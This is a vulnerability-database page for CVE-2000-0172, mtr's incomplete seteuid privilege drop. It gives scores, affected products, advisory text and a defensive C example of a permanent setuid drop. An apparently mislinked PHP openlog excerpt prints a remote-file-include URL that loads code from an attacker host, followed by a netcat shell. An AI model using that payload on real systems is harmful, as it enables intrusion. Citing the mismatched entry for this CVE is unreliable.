CVE-2000-0172
Published 2000-03-03
CVE-2000-0172: The mtr program only uses a seteuid call when attempting to drop privileges, which could allow local users to gain root privileges.
Priority P425 · high · 7.2 · CVSS 2.0
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 0.82% (52.7th percentile)
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| matt_kimball_and_roger_wolff | mtr | — | — |
| matt_kimball_and_roger_wolff | mtr | — | — |
| turbolinux | turbolinux | — | — |
| turbolinux | turbolinux | — | — |
| turbolinux | turbolinux | — | — |
| turbolinux | turbolinux | — | — |
No detection rules found.
Exploit-DB
PHP 4.3.7 - 'openlog()' Remote Buffer Overflow
exploitdb·2004-12-28
CVE-2003-0172 PHP 4.3.7 - 'openlog()' Remote Buffer Overflow
---
http://www.vulnerable.box/remincl.php?page=http://3v1l.h4x0r.b0x/tooopenlog.php.txt
BOOM....
netcat www.vulnerable.box 65535
Microsoft Windows 2000 [versie 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Program Files\Apache Group\Apache2>
--->
Getting a shell is better than parsing commands to the weblog.
[email protected] wrote on bugtraq :
>* Buffer overflow in openlog()
>
>I've tried passing long parameters (and large integers) to openlog(). No
>crashes could be caused by this "exploit". I was unable to demonstrate any
>disruption to PHP via this "vulnerability", let alone complete control.
>Unless the vendor or the original reporter will confirm this with code
>(which was, oddly enough, MISSING from the original advisor
Exploit-DB
Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr (2)
exploitdb·2000-03-03
CVE-2000-0172 Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr (2)
---
// source: https://www.securityfocus.com/bid/1038/info
A potential vulnerability exists in the 'mtr' program, by Matt Kimball and Roger Wolff. Versions prior to 0.42 incorrectly dropped privileges on all Unix variants except HPUX. By calling seteuid(getuid()), the authors hoped to drop privileges so that root could not be obtained through a vulnerability in mtr or a library it depends on. However, due to saved uid semantics, the uid of 0 can be recovered simply by doing a setuid(0). An attacker would only need to find an overflow in one of the libraries mtr uses, such as gtk or curses. In patched versions, the seteuid() call has been changed to setuid(). This will e
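The permanent privilege drop described in the advisory above, written as an added example (it is not code from mtr or from the advisory). The helper name `drop_privileges_permanently` is hypothetical, and the code assumes Linux/glibc for `getresuid()` and a set-uid-root binary that never needs root again after the call.

```c
#define _GNU_SOURCE           /* getresuid()/getresgid() on glibc */
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: permanently drop set-uid-root privileges.
 * Returns 0 on success, -1 if any ID could still lead back to root. */
int drop_privileges_permanently(void)
{
    uid_t uid = getuid();     /* real IDs identify the invoking user */
    gid_t gid = getgid();
    uid_t r, e, s;
    gid_t rg, eg, sg;

    /* Group first: after setuid() the process may no longer change it. */
    if (setgid(gid) != 0)
        return -1;
    /* With euid 0, setuid() sets the real, effective AND saved uid.
     * seteuid() would change only the effective uid and leave saved uid 0. */
    if (setuid(uid) != 0)
        return -1;

    /* Verify the resulting credentials instead of trusting return codes. */
    if (getresuid(&r, &e, &s) != 0 || r != uid || e != uid || s != uid)
        return -1;
    if (getresgid(&rg, &eg, &sg) != 0 || rg != gid || eg != gid || sg != gid)
        return -1;

    /* Invoked by root itself: there is nothing to drop. */
    if (uid == 0)
        return 0;

    /* The CVE-2000-0172 condition: if root can be recovered, the drop failed. */
    if (setuid(0) == 0 || seteuid(0) == 0)
        return -1;
    return 0;
}

int main(void)
{
    if (drop_privileges_permanently() != 0) {
        fprintf(stderr, "privilege drop failed, refusing to continue\n");
        return 1;
    }
    printf("uid=%d euid=%d\n", (int)getuid(), (int)geteuid());
    return 0;
}
```

Call it once, immediately after the last operation that needs root (for mtr, opening its raw sockets), and treat a non-zero return as fatal.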
No writeups or analysis indexed.